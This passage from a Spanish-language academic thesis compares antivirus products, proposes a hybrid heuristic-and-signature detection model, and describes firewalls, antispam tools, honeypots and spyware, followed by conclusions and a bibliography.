Por otra parte, el Virus Wall es capaz de analizar en tiempo real el tráfico SMTP y FTP para buscar virus. Evidentemente, este análisis debe combinarse con el análisis heurístico durante el rastreo de un posible virus, pero, para entonces, no será necesario el análisis de patrones. PC-Cillin es un producto a considerar cuando conviven equipos UNIX y Windows 2000 dentro de una empresa (Montesino, 2005)44. 8.5.8 AVP. Fabricado por Kaspersky Lab, el AVP, de origen ruso, es uno de los productos más apreciados entre los entendidos por la potencia de su motor antivirus en lo que toca a detección y desinfección. Junto con el software, se obtiene soporte técnico por correo electrónico y actualizaciones diarias de las bases de virus durante un año. AVP se destaca por presentar una de las interfaces más sencillas y prácticas. A su ya conocida potencia como motor antivirus, se suman unos resultados excelentes a nivel de soporte, al ser el primero en aportar una solución para una infección por virus, así como ganar en la contestación a una consulta realizada mediante el correo, en ambos casos con tiempos de respuesta sorprendentes. Su peor resultado fue en el indicador de asistencia telefónica (Hispasec, 2005)33. En el apartado técnico, AVP volvió a obtener buenos resultados en las pruebas de detección, tal y como ocurrió en comparaciones pasadas. Fue, junto con Norman, el primero en resolver con éxito la instalación en un sistema infectado. Su heurística también se ha mostrado acertada las veces que se ha puesto a prueba, y su dominio en el apartado de soporte de formatos de compresión es absoluto, muy por encima del resto en la prueba de compresores de ejecutables. Su sencillez y potencia tiene en contra un punto débil que este año quedó demostrada: la ausencia de módulos específicos para analizar las vías de entrada desde Internet, con el agravante de su conflicto con Outlook Express (Montesino, 2005)44. 8.6 FUTURO DE LOS SISTEMAS ANTIVIRUS 8.6.1 Estado del arte de los antivirus como justificación para la creación de un modelo híbrido. La protección ofrecida por un producto antivirus típico es estática, lo que significa que la filosofía tras el producto es detectar y (algunas veces) eliminar virus que los creadores del antivirus ya conocen. Sin embargo, como se demostró claramente con la explosión de las infecciones de Melissa, este método tiene su riesgo: mientras los computadores están cada vez más interconectados, aumenta la capacidad para expandirse de los virus que se propagan mas rápido que los procesos de detección y remoción. Con este propósito muchos vendedores de antivirus han adicionado la característica de detección de virus “desconocidos” a sus productos. Hay muchas sub-clases de esta detección de virus genérica, cada una con sus fortalezas y debilidades. Sin embargo, algunos aspectos son universalmente ciertos:

121

La detección de virus conocidos es mas confiable cuando se trata con virus ya conocidos. Por lo tanto, no es muy probable que las técnicas genéricas reemplacen a los scanners basados en características específicas del agente de infección. Las técnicas genéricas no deben marcar como infectados archivos que están “limpios”. Tal confusión (conocida como falsos positivos) puede darle tanto trabajo al usuario como una infección real, dado que la muestra debe ser capturada y enviada al distribuidor de antivirus. El vendedor debe entonces explícitamente excluir el archivo de la detección, o cambiar el sistema entero de detección para que ese archivo (y archivos similares) no sean marcados por error. Se puede concluir entonces que las técnicas genéricas son más efectivas como complemento y no como reemplazo de las técnicas tradicionales. El próximo paso en la evolución de los productos antivirus seria un acoplamiento entre las técnicas genéricas y las específicas (o tradicionales). Cuando un nuevo virus es descubierto en The Wild, el virus es identificado y capturado genéricamente y la detección de virus conocidos se adiciona automáticamente para proveer inmunidad para ese virus a nivel mundial. Un producto de este tipo no es ni genérico ni específico, es un híbrido, que permite no solo la implementación de ambas técnicas sino también la integración de las estrategias de detección genéricas y específicas. De acuerdo a varias simulaciones realizadas este tipo de técnica reduciría dramáticamente la oportunidad de una infección de virus de alcanzar proporciones epidémicas, porque a las otras máquinas en el resto del mundo se les daría inmunidad tan pronto el virus fuera detectado en una. Sin embargo, como los computadores pueden intercambiar datos extremadamente rápido, este proceso necesita volverse mucho más frecuente y automatizado. Por lo tanto, la próxima generación de productos antivirus debe ser capaz de tratar con los virus conocidos y desconocidos que lleguen a determinado host. El virus debe ser detectado de alguna manera y cuando sea posible y deseable, ser curado. Además cualquier otro computador que encuentre el mismo virus debe ser capaz de identificar el virus inmediata y exactamente. 8.6.2 Modelo Hibrido. propuesto debe tener: Estos son los componentes que el sistema hibrido

Habilidad para detectar virus desconocidos: Mientras que un antivirus diseñado para los desafíos del futuro compartirá similitudes con los sistemas actuales, también habrá diferencias importantes. El sistema debe, por supuesto, primero que todo inicialmente encontrar el virus.

122

Con ese fin, el software que tiene una combinación de técnicas de detección de virus debe presentarse en el equipo del usuario. Como mínimo estos deben consistir de uno o más de los siguientes: Heurística basada en una muestra Simulación de código Técnicas Post-infección, como el checksumming Generación de inmunidad Una vez que un nuevo virus es encontrado o si la cura no está disponible, el sistema debe ofrecer procesos seguros y personalizables para proveer la cura. Mientras que hay muchas metodologías posibles para alcanzar este resultado, la arquitectura más posible de este tipo de sistema es que cuando se encuentra un virus nuevo, una cura es derivada, y un sistema de distribución central envía esta cura alrededor del mundo, proporcionando inmunidad a otros equipos, aun aquellos que no han sido infectados con el virus. Algunos vendedores de antivirus pueden afirmar que este proceso no es necesario, después de todo, la heurística detectó el virus sin necesidad de tener ninguna inmunidad, desafortunadamente esto es falso, como se ilustra a continuación. Ciertas técnicas heurísticas (como los monitores de comportamiento y los verificadores de integridad) funcionan post-infección, a diferencia de la detección de virus conocidos que ocurre antes que un virus tenga la oportunidad de infectar un equipo. Es claro que aun si el virus es detectado por una heurística post-infección, el equipo ha tenido la posibilidad de ser dañado por cualquier virus que se haya podido implementar. Por lo tanto es mucho mejor proveer detección pre-infección, y permitir a otros usuarios el acceso a técnicas de detección de virus conocidos antes de encontrarse con el virus, eliminando cualquier daño post-infección. Ninguna heurística que opere pre-infección es perfecta, por lo tanto en el caso de un virus polimórfico, es muy posible que un virus pueda ser detectado genéricamente en algunas muestras y no en otras. Otra razón para no confiar mucho en la detección heurística es que por su misma naturaleza es muy dinámica. Una situación típica con el rango actual de productos es que una nueva muestra pueda ser detectada por la heurística de un producto. Actualizaciones subsecuentes del producto le proveen al scanner una marca con la que puede identificar el mismo virus. Por lo tanto, de alguna forma es de naturaleza transitiva. Debe considerarse también un producto cuya detección heurística lleve a un falso positivo—una actualización de la heurística puede llevar a que la heurística en un nuevo producto no tenga virus que ya fueron detectados.

123

La detección pre-infección es también importante cuando se consideran algunos de los virus de infección de archivos más complejos, especialmente aquellos que específicamente infectan archivos ejecutables portátiles de Windows. La desinfección de los archivos infectados con este tipo de virus es una cuestión compleja. Aparte del hecho que algunos virus se caracterizan por corromper archivos en el momento de la infección, hay muy poca seguridad en confiar en una desinfección de un producto antivirus para que restaure este tipo de archivos exactamente. Velocidad de respuesta: Uno de los principales beneficios de sintetizar la detección de virus conocidos y desconocidos es la inmunidad, es importante que cualquier sistema híbrido sea capaz de de responder a tiempo ante muchos nuevos virus. La habilidad de llegar a un gran número de transacciones es importante, específicamente, la funcionalidad del producto debe permitir la habilidad de proveer actualizaciones literalmente instantáneas; esto puede requerir un diseño de red jerárquico, con nodos globalmente distribuidos que actúen como sistemas gateway a centros de análisis potencialmente múltiples. Robustez: Especular sobre los problemas potenciales con la robustez de un sistema híbrido es difícil sin proponer una arquitectura específica detallada. Sin embargo, hay algunas líneas genéricas de ataque que parecen las más posibles. Hay varias capas de un sistema autómata que podrían se atacadas por un virus, empleando una de varias técnicas diferentes. Primero, el sistema puede ser atacado directamente por un virus. En este tipo de ataque, el autor del virus intentaría derrotar al sistema en el lado del cliente, desarrollando virus que evadan técnicas heurísticas de detección de virus, o simplemente deshabilitando totalmente al cliente. Aunque estos efectos son importantes para predecir y tomar medidas para prevenir, no son nada nuevo; es de notar aquí un ataque masivo a un sistema híbrido. En el caso de un sistema híbrido que emplee clientes inteligentes que envíen información a un hub central para su distribución, la forma más posible de ataque sería una característica de de impacto directo. Seguridad, disponibilidad y facilidad de uso: Cualquier proceso que requiera el envío de muestras o fragmentos debe ser seguro en el sentido clásico de seguridad; esto significa que no debe violar la confidencialidad, disponibilidad e integridad de la información que maneja. Además, otro aspecto importante del sistema es la facilidad de uso; aun si la tecnología esta en posición de proveer automatización de la captura de muestras, análisis y generación de inmunidad, si el sistema no es fácil de configurar, no alcanzará esta meta.

124

9. PROGRAMAS DE SEGURIDAD 9.1 SOFTWARE DE SEGURIDAD La seguridad ha sido el principal concerniente a tratar cuando una organización desea conectar su red privada al Internet. Sin tomar en cuenta el tipo de negocios, se ha incrementado el numero de usuarios de redes privadas por la demanda del acceso a los servicios de Internet tal es el caso del World Wide Web (WWW), Internet Mail (e-mail), Telnet, y File Transfer Protocol (FTP). Adicionalmente los corporativos buscan las ventajas que ofrecen las paginas en el WWW y los servidores FTP de acceso publico en el Internet. Los administradores de red tienen que incrementar todo lo concerniente a la seguridad de sus sistemas, debido a que se expone la organización privada de sus datos así como la infraestructura de sus red a los Expertos de Internet (Internet Crakers). Para superar estos temores y proveer el nivel de protección requerida, la organización necesita seguir una política de seguridad para prevenir el acceso no-autorizado de usuarios a los recursos propios de la red privada, y protegerse contra la exportación privada de información. Todavía, aun si una organización no esta conectada al Internet, esta debería establecer una política de seguridad interna para administrar el acceso de usuarios a porciones de red y proteger sensitivamente la información secreta. 9.2 SOFTWARE ANTISPAM Cada día una cantidad descomunal de mensajes no solicitados inunda las casillas de correo electrónico y pone en peligro a una herramienta que ya es vital para millones de personas en todo el mundo. Mientras los distintos gobiernos se deciden a adoptar medidas legales y la industria del software antispam da sus primeros pasos, los usuarios desprevenidos tienen que hurgar entre montañas de correo basura para encontrar un mensaje genuino. En un principio, recibir de forma esporádica en nuestra casilla de correo electrónico publicidades no solicitadas sobre páginas eróticas, préstamos a tasas irrisorias o recetas para hacerse rico puede no molestar, o hasta parecernos gracioso o anecdótico. Pero cuando el crecimiento en el volumen de estos mensajes se vuelve incontrolable, el 'correo basura' -o spam en inglés- se transforma en una amenaza para el funcionamiento del correo electrónico, herramienta indispensable para millones de personas en todo el mundo.

125

9.3 SOFTWARE ANTISPAM COMO HERRAMIENTA EN LA LUCHA CONTRA EL SPAM Las medidas para combatir el Spam se desarrollan en tres ámbitos diferentes. Por un lado, los distintos gobiernos están encarando el problema de brindar un marco legal para contener el Spam. En el plano tecnológico, la industria del software está desarrollando distintas herramientas para filtrar el correo basura. En el ámbito del usuario, por último, hay distintas medidas que pueden ayudar a combatir o reducir el ingreso de correo basura. Existen diversas herramientas tecnológicas para combatir el spam. La mayoría de estos programas combinan las 'listas blancas' y 'listas negras' para filtrar los mensajes, con otras funcionalidades. Estos son algunos de ellos: SpamNet: permite a los usuarios de Outlook que toda vez que un usuario indica como spam a un determinado mensaje, esa información sea enviada a las bases de datos de Cloudmark. Una vez que una determinada cantidad de usuarios identifican a una dirección de mail como Spammer, ésta pasa a formar parte de una lista negra con información compartida por todos los usuarios del programa. MailWasher: además de verificar que el mail del remitente no esté catalogado como Spammer en alguna lista, permite enviar automáticamente al remitente un mensaje falso indicando que la casilla de correo destino no existe. Matador: Filtra por listas blancas y negras y verificar la procedencia de los mensajes, cuenta con un sistema denominado Desafío: cuando el usuario recibe un mensaje desde una dirección desconocida – que no está en la lista blanca – Matador responde al remitente del mensaje con un desafío muy simple, como ingresar el número que aparece en una imagen. Si el remitente es un equipo de spam automático no pasará la prueba y el usuario nunca recibirá el mensaje basura (Bancorio, 2005)7. Un Firewall en Internet es un sistema o grupo de sistemas que impone una política de seguridad entre la organización de red privada y el Internet. El firewall determina cual de los servicios de red pueden ser accesados dentro de esta por los que están fuera, es decir quien puede entrar para utilizar los recursos de red pertenecientes a la organización. Para que un firewall sea efectivo, todo trafico de información a través del Internet deberá pasar a través del mismo donde podrá ser inspeccionada la información. El firewall podrá únicamente autorizar el paso del trafico, y el mismo podrá ser inmune a la penetración. desafortunadamente, este sistema no puede ofrecer protección alguna una vez que el agresor lo traspasa o permanece entorno a este (Figura 7).

126

Figura 7. Ubicación de un Firewall

Los Firewalls en Internet administran los accesos posibles del Internet a la red privada. Sin un firewall, cada uno de los servidores propios del sistema se exponen al ataque de otros servidores en el Internet. Esto significa que la seguridad en la red privada depende de la “Dureza” con que cada uno de los servidores cuenta y es únicamente seguro tanto como la seguridad en la fragilidad posible del sistema. El firewall permite al administrador de la red definir un “choke point” (envudo), manteniendo al margen los usuarios no-autorizados (tal, como., hackers, crakers, vándalos, y espías) fuera de la red, prohibiendo potencialmente la entrada o salida al vulnerar los servicios de la red, y proporcionar la protección para varios tipos de ataques posibles. Uno de los beneficios clave de un firewall en Internet es que ayuda a simplificar los trabajos de administración, una vez que se consolida la seguridad en el sistema firewall, es mejor que distribuirla en cada uno de los servidores que integran nuestra red privada. El Firewall ofrece un punto donde la seguridad puede ser monitoreada y si aparece alguna actividad sospechosa, este generara una alarma ante la posibilidad de que ocurra un ataque, o suceda algún problema en el transito de los datos. Esto se podrá notar al acceder la organización al Internet, pero cuando ocurrirá el ataque es incierto. Esto es extremadamente importante para que el administrador audite y lleve una bitácora del tráfico significativo a través del Firewall. También, si el administrador de la red toma el tiempo para responder una alarma y examina regularmente los registros de base. Esto es innecesario para el Firewall, porque que el administrador de red desconoce si ha sido exitosamente atacado.

127

9.4 LIMITACIONES DE UN FIREWALL Un Firewall no puede protegerse contra aquellos ataques que se efectúen fuera de su punto de operación. Por ejemplo, si existe una conexión dial-out sin restricciones que permita entrar a nuestra red protegida, el usuario puede hacer una conexión SLIP o PPP al Internet. Podría ser incómodo para algunos usuarios cuando se solicita una autenticación adicional requerida por un Firewall Proxy server (FPS) lo cual puede ser provocado por un sistema de seguridad circunvecino que está incluido en una conexión directa SLIP o PPP del ISP. Este tipo de conexiones derivan la seguridad provista por Firewall construido cuidadosamente, creando una puerta de ataque. Los usuarios pueden estar consientes de que este tipo de conexiones no son permitidas como parte integral de la arquitectura de la seguridad en la organización. 9.5 HONEYPOTS Y HONEYNETS Un Honeypot es un sistema diseñado para analizar cómo los intrusos emplean sus armas para intentar entrar en un sistema (analizan las vulnerabilidades) y alterar, copiar o destruir sus datos o la totalidad de éstos (por ejemplo borrando el disco duro del servidor). Por medio del aprendizaje de sus herramientas y métodos se puede, entonces, proteger mejor los sistemas. Pueden constar de diferentes aplicaciones, una de ellas sirve para capturar al intruso o aprender cómo actúan sin que ellos sepan que están siendo vigilados. También existe el Honeynet, que es un conjunto de Honeypots, así abarca más información para su estudio. Incluso hace más fascinante el ataque al intruso, lo cual incrementa el número de ataques. La función principal a parte de la de estudiar las herramientas de ataque, es la de desviar la atención del atacante de la red real del sistema y la de capturar nuevos virus o gusanos para su posterior estudio. Una de las múltiples aplicaciones que tiene es la de poder formar perfiles de atacantes y ataques. Son sistemas que deliberadamente se decide exponerlos a ser atacados o comprometidos. Estos, no solucionan ningún problema de seguridad, son una herramienta que nos sirve para conocer las estrategias que se emplean a la hora de vulnerar un sistema. Son una herramienta muy útil a la hora de conocer de forma precisa los ataques que se realizan contra la plataforma de trabajo que hemos elegido, o bien, las plataformas configuradas de la misma forma, y que sirven para guardar todos los procesos que se están ejecutando contra o en nuestro sistema con el claro objetivo de acceder a información sensible para una organización, empresa o corporativo. Así mismo nos permiten conocer nuevas vulnerabilidades y riesgos de los distintos sistemas operativos y diversos entornos y programas, las cuales aún no se encuentren debidamente documentadas (Virusprot, 2005)57.

128

Los Firewalls (sistemas o combinación de sistemas que fijan los límites entre dos o más redes y restringen la entrada y salida de la información) son parte esencial de cualquier solución de seguridad en redes y para proporcionar la máxima protección contra ataques, a la vez que permiten soportar aplicaciones innovadoras, es importante que estos equipos actúen como parte de todo un sistema integral de seguridad. En definitiva, un firewall (barrera de protección o procedimiento de seguridad que coloca un sistema de cómputo programado especialmente entre una red segura y una red insegura, pudiendo ser ésta última Internet pues es considerada siempre una zona peligrosa) es un complemento al resto de medidas corporativas que se han de tomar para garantizar la protección de la información y que han de contemplar no solo los ataques externos, sino también los internos, que puede realizar el propio personal, así como todas aquellas aplicaciones que están instaladas y que pueden tener agujeros o huecos significativos por los que se puedan colar los intrusos. En seguridad toda medida es poca y hay que estar innovando continuamente (actualizando políticas y medios para afinar los recursos de seguridad) para no dejar huecos por donde puedan colarse los intrusos, pero como esto no siempre es evitable (la seguridad absoluta en la práctica no existe, podemos siempre irnos aproximando a ella, pero como concepto constituye un objetivo irrealizable), es como de manera obligada o natural se abre paso a todo un universo de técnicas más elaboradas e incluso ingeniosas, como es facilitar la entrada a la red pero por caminos falsos que no conducen a nada concreto o esperable para un posible atacante y que permiten al responsable de la seguridad del sistema detectar los intentos de intrusión, con lo que se está sobre aviso y es más fácil protegerse. A estas técnicas se les conoce como “Honeypots” o tarros de miel (y se usan para conseguir literalmente que los intrusos, atacantes o saboteadores “se engolosinen” y crean que en realidad están vulnerando todo y durante este proceso se puedan tomar medidas verdaderamente preventivas), y consisten en instalar servidores de red (comúnmente UNIX o NT) específicamente para atraer la atención actuando como trampas, consiguiendo registrar movimientos y alertando a los administradores de la red de que se está produciendo un intento de violación, con lo cual hay tiempo de reacción para parar el ataque y obtener los datos del posible intruso. Simulan ser un elemento real de red, pero están desactivados para que no se pueda tomar su control desde el exterior, se encuentran en una zona al margen del tráfico convencional y disponen de un auténtico filtro dedicado para evitar todo el tráfico saliente en caso de que fallen o un experto (un verdadero hacker y no un atacante furtivo o novato, o un auténtico especialista formado en estos temas) consiga acercarse lo suficiente como para intentar tomar su control (Virusprot, 2005)57. De hecho, cuando se piensa en seguridad para las redes se piensa en routers (controladores de tráfico en las redes), Firewalls y en Sistemas de Detección de Intrusos (éstos forman parte del modelo de seguridad adoptado por una

129

organización o empresa, sirven para detectar actividades inapropiadas, incorrectas o anómalas desde el exterior o interior de todo un sistema informático). En este contexto es como se nos presentan los Honeypots como alternativa -además de adicional- bastante útil como una medida eficaz que nos permita afinar nuestros criterios de seguridad corporativa e incluso con el tiempo poder ir contribuyendo a la evolución y desarrollo de estándares internacionales de seguridad. En la actualidad ya se empiezan a tener investigaciones serias en este sentido (Honeynet Project), los honeypots hasta el momento solamente son algo experimental y con fines de estudio. Recalcamos también que, no podemos ser por el momento demasiado optimistas, uno de los tantos estudios –de acuerdo con Cristian Fabián A.S.S. Borghello- revela como a “un intruso le tomó menos de un minuto irrumpir en la computadora de la universidad, estuvo dentro menos de media hora y a los investigadores les tomó 34 horas descubrir todo lo que hizo” y, también se estima que “esas 34 horas de limpieza pueden costar 2.000 dólares a una organización y 22.000 si se debiera tratar con un consultor especializado.” (Virusprot, 2005)57. 9.6 SOFTWARE ANTISPY Se llama Spyware a los programas diseñados para espiar el comportamiento de los usuarios, fundamentalmente cuando se encuentran conectados a Internet. Los programas que rastrean la información sobre hábitos de consumo y navegación de los internautas pueden realizar muchas actividades de manera sigilosa, sin que nadie lo advierta. Con intervalos de tiempo programables, el programa se conecta a través de Internet con un servidor de la compañía que lo distribuyó y transmite diligentemente toda la información que ha recopilado. Utilizan sistemas de camuflaje casi perfectos. Se suelen instalar en la PC junto con algún tipo de aplicación (un cliente de P2P, alguna utilidad para el disco rígido, etc.). Los nombres de los archivos que corresponden con estos programas no suelen dar una idea de su verdadera naturaleza, por lo que pueden pasar desapercibidos entre otros archivos de una aplicación. No provocan ningún efecto visible en el ordenador, ni cuando son instalados, ni cuando se encuentran en plena acción. Por ello, precisamente, los usuarios no suelen preocuparse de si algún programa de este tipo se encuentra instalado en su sistema. No se trata de un virus, por lo cual los programas antivirus no los detectan. Por tal motivo, para detectar Spyware es necesario utilizar aplicaciones específicas.

130

10. CONCLUSIONES • Con la información recopilada de numerosas fuentes sobre la historia de los virus y el conocimiento obtenido analizando el comportamiento de los virus en la actualidad, no es exagerado afirmar que no importa lo mucho que avance la tecnología los virus se mantendrán a la par. En el futuro los dispositivos electrónicos van a hacer parte de la vida diaria del hombre promedio, este tipo de tecnología puede también llegar a ser blanco de los códigos nocivos. El punto más vulnerable para la seguridad de los equipos lo constituyen los propios usuarios, dado que por curiosidad y falta de conocimiento o ignorancia activan y ayudan a la propagación de códigos nocivos que causan grandes daños a la información. La función de los programas antivirus que existen en la actualidad no proporciona un 100% de protección para todos los virus existentes, sin embargo es una industria en constante evolución, es necesario aclarar que un porcentaje considerable de la efectividad del antivirus depende del usuario. La tarea principal de un antivirus es detectar y detener un virus que ha infectado un equipo y tomar las medidas necesarias En la actualidad se emplean dos métodos para detección de virus, el scanning usa fragmentos de código de virus ya conocidos (que han estado ahí afuera “In the wild” infectando equipos) para identificar posibles infecciones, la técnica heurística ofrece una solución un poco más rápida que busca señales o patrones de comportamiento típicos de un virus. Ambas técnicas presentan serias desventajas siendo tiempo la más notoria de la técnica de scanning y falta de confiabilidad (dadas las muchas falsas alarmas potenciales) la falla más prominente de la técnica heurística. En este proyecto se reúne documentación que proyecta el futuro de los antivirus en la forma de un modelo híbrido que no solo implemente ambas, la detección de virus conocidos y no conocidos, sino que también las acople de una forma que se complementen la una a la otra para brindar una mayor protección al usuario final. Los usuarios no solo son victimas de los creadores de código nocivo, existen otras formas de software “indeseable” con las que tienen que tratar a diario, se presentan como el ejemplo más obvio el spyware y el spam que son el resultado del afán de las grandes corporaciones por obtener información sobre el usuario para actualizar sus bases de datos y ampliar su mercado.

131

Los sistemas Linux no son blanco frecuente de los ataques con código nocivo debido a la mayor popularidad que tienen los sistemas Windows, su contraparte. Dado que el creador de código nocivo busca reconocimiento y popularidad es lógico que escoja el sistema más usado como blanco de sus ataques. Las herramientas para la creación de virus están al alcance de cualquier persona que navegue en Internet, y en este proyecto comprobamos(con la creación de un prototipo de Worm con las características mas primitivas en Visual Basic) que es bastante sencillo crear un Worm básico que tiene el potencial de ser mejorado con características de stealth y métodos sofisticados de propagación. Todas estas rutinas están explicadas en detalle en la red y su implementación requiere solo un mínimo de conocimiento de programación. Analizando los tipos de virus y sus clasificaciones se puede esperar que sus técnicas y definiciones sigan multiplicándose, debido a que la naturaleza del virus creado depende solo de la creatividad de su creador a la hora de programar diferentes tipos de ataque y nuevas formas de propagación. El riesgo de propagación de virus aumenta de forma directamente proporcional al incremento de la popularidad de programas como el msn Messenger, IRC, Outlook y programas del tipo P2P (Peer to Peer).

132

BIBLIOGRAFÍA 1. HERNÁNDEZ HERNÁNDEZ, Arturo. Virus informático. México: Universidad Nacional Autónoma de México, 2000. 4 p. 2. ________. ________México: Universidad Nacional Autónoma de México, 2000. 8 p. Otros sitios consultados: 3. Alerta-Virus. ¿Dónde se esconden?. Obtenida en Julio de 2005, de http://alertaantivirus.red.es/virus/ver_pag.html?tema=V&articulo=1&pagina=4 4. Alerta-Virus. Faq (Preguntas Frecuentes). Obtenida en Agosto de 2005, de http://alerta-antivirus.red.es/accesofacil/af-faq.htm#queson 5. Alerta-Virus. Tipos de Virus. Obtenida en Julio de 2005, http://alertaantivirus.red.es/virus/ver_pag.html?tema=V&articulo=1&pagina=2 de

6. ÁLVAREZ MARAÑÓN. Gonzalo. Correo basura. Obtenida en Julio de 2005, de http://www.iec.csic.es/criptonomicon/spam/ 7. Bancorio. La lucha contra el spam: Una guerra en varios frentes. Obtenida en Octubre de 2005, de http://www.bancorio.com.ar/individuos/rioonline_spam.jsp 8. BLAESS, Christophe. Virus: nos afecta a todos. Obtenida el 28 de Junio de 2005, de http://es.tldp.org/LinuxFocus/pub/mirror/LinuxFocus/Castellano/September2002/art icle255.shtml 9. CANTO, Julio. Vulnerabilidad en rama 2.6 del kernel de Linux por problema con routing_ioctl(). Obtenida en Septiembre de 2005, de http://www.hispasec.com/unaaldia/2525 10. Cibernauta. La III Campaña de Seguridad ofrece una solución antivirus para dispositivos PDA. Obtenida en Septiembre de 2005, de http://www.cibernauta.com/cibertecno/cibertecno_software_articulos.php?articulo= 3566.php 11. Ciberteca. La API de Windows. Obtenida en Septiembre de 2005, de http://www.ciberteca.net/articulos/programacion/win32apis/

133

12. Comunicaciones World. La industria prepara un nuevo estándar de seguridad para móviles. Obtenida en Octubre del 2005, de http://www.aecomo.org/content.asp?contentid=3900&contenttypeid=2&catid=150& cattypeid=2 13. Consumer. Virus para teléfonos móviles: una maldición a la vuelta de la esquina. Obtenida en Septiembre de 2005, de http://www.consumer.es/web/es/tecnologia/software/2005/09/11/145180.php 14. CONTRERAS, Mejuto G. Antivirus: no salga a Internet sin ellos. Obtenida en Septiembre de 2005, de http://www.idg.es/pcworld/articulo.asp?id=119462 15. CORREA, Sergio. WAP: Tierra virgen para hackers. Obtenida en Septiembre de 2005, de http://www.hipermarketing.com/nuevo%204/contenido/tecnologia/telecomunicacion es/nivel3wap.html 16. Datacraft. Historia de los virus. Obtenida en Junio de 2005, de http://www.datacraft.com.ar/informatica-virushist.html 17. Diarioti. La telefonía IP será el nuevo blanco de los hackers. Obtenida en Septiembre de 2005, de http://www.diarioti.com/gate/n.php?id=9629 18. Donatién. Qué es el registro de Windows. Obtenida en Septiembre de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Viendo=76 19. El Hacker. Básicamente ¿Qué son los Troyanos?. Obtenida en Julio de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=129 20. El Hacker. Información básica sobre virus informáticos. Obtenida en Julio de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=263 21. El Hacker. Listado de puertos utilizados por troyanos. Obtenida en Septiembre de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=267 22. El PAIS, Operadoras y fabricantes intentan blindar los móviles ante la llegada de virus. Obtenida en Septiembre de 2005, de http://www.aecomo.org/content.asp?contentid=3859&contenttypeid=2&catid=150& cattypeid=2 23. ESPIÑEIRA, Sheldon y Asociados. Los virus informáticos: Conocer el pasado para enfrentar el futuro. Obtenida en Septiembre de 2005, de http://www.pc-news.com/detalle.asp?sid=&id=11&Ida=1978

134

24. Falckon. Infección de ejecutables bajo VB. Obtenida en Septiembre de 2005, de http://zod.com.mx/~gedzac/ezine/mitosis2.zip 25. FalKen. Librerías Dinámicas. Obtenida en Septiembre de 2005, de http://www.canalvisualbasic.net/temarios/api1.asp 26. F-Secure Corporation. F-Secure Mobile Anti-Virus Symbian. Obtenida en Septiembre de 2005, de http://www.abcdatos.com/programas/programa/z1075.html 27. GALLO, Julián. En el futuro, los virus de computadora podrían enfermar a seres humanos. Obtenida en Septiembre de 2005, de http://www.juliangallo.com.ar/2004/11/en-el-futuro-los-virus-de-computadora.html 28. Geocities. Historia. Obtenida en Julio de 2005, de http://www.geocities.com/ogmg.rm/Historia.html 29. Google. FAQ es.comp.virus. Obtenida en Agosto de 2005, de http://groups.google.es/group/es.comp.virus/msg/8f288d5d0a4f678e?dmode=sour ce 30. GORDON, Sarah. Antivirus Software Testing for the New Millenium. Obtenida en Octubre de 2005, de http://csrc.nist.gov/nissc/1996/papers/NISSC96/paper019/final.PDF 31. HERNÁNDEZ, Claudio. Hackers los piratas del chip y de Internet. Obtenido en Junio de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=38 32. HERRANZ, Arantxa. Los virus para móviles. La punta del iceberg de mayores amenazas. Obtenida en Septiembre de 2005, de http://www.idg.es/dealer/actualidad.asp?id=43372 33. Hispasec. Comparativa Antivirus 2001: Comparativa Antivirus. Obtenida en Septiembre de 2005, de http://www.hispasec.com/directorio/laboratorio/articulos/Comparativa2001/index_ht ml 34. IBLNEWS, Agencias. Los hackers sitúan su próximo objetivo en los teléfonos móviles. Obtenida en Septiembre de 2005, de http://iblnews.com/noticias/02/123917.html 35. IÑAKI, Urzai. Los virus del pasado y del futuro. Obtenida en Septiembre de 2005, de http://www.windowstimag.com/atrasados/2004/87_mai04/articulos/firma_3.asp

135

36. kaspersky. Protección para PDAs. Obtenida en Septiembre de 2005, de http://www.kaspersky.com.mx/prod.corp.pdas.html 37. Kuasanagui. Programación básica en Visual Basic. Obtenida en Septiembre de 2005, de http://zod.com.mx/~gedzac/index2.php?id=articulos 38. Machado, Jorge. Breve Historia de los virus informáticos. Obtenida en Junio de 2005, de http://www.perantivirus.com/sosvirus/general/histovir.htm 39. Manson M. Estudio sobre virus informáticos. Obtenida en Septiembre de 2005, de http://www.monografias.com/trabajos/estudiovirus/estudiovirus.shtml 40. Mcafeeb2b. Protección para móviles y PDAs. Obtenida en Septiembre de 2005, de http://www.mcafeeb2b.com/international/spain/products/virusscanwireless/default.asp 41. MIASTKOWSKI, Stan. Virus ¡cuidado con la próxima generación!. Obtenida en Septiembre de 2005, de http://www.pcwla.com/pcwla2.nsf/0/E0F43200AA5A342080256A5D005DE23D 42. Microsoft. Introducción a los virus gusanos y troyanos. Obtenida en Agosto de 2005, de http://www.microsoft.com/spain/seguridad/usuarios/viruses/virus101.mspx 43. Monografías. Seguridad informática: Virus informáticos. Obtenida en Agosto de 2005, de http://www.monografias.com/trabajos5/virusinf/virusinf.shtml#Quién_los_hace 44. MONTESINO ARMAS, Luis. (2003). Análisis comparativo de los principales sistemas antivirus [versión electronica]. Obtenida en Octubre de 2005, de http://eprints.rclis.org/archive/00001748/01/analisis.pdf 45. MORENO PÉREZ, Arnoldo. Puertas traseras o Backdoors. Obtenida en Junio de 2005, de http://alerta-antivirus.red.es/seguridad/ver.php?tema=S&articulo=4&pagina=2 46. MORENO PÉREZ, Arnoldo. Los virus en los PDAs. Obtenida en Septiembre de 2005, de http://www.virusprot.com/Art35.html 47. Morgan. El spyware Que es, como funciona y como evitarlo. Obtenida en Septiembre de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=280

136

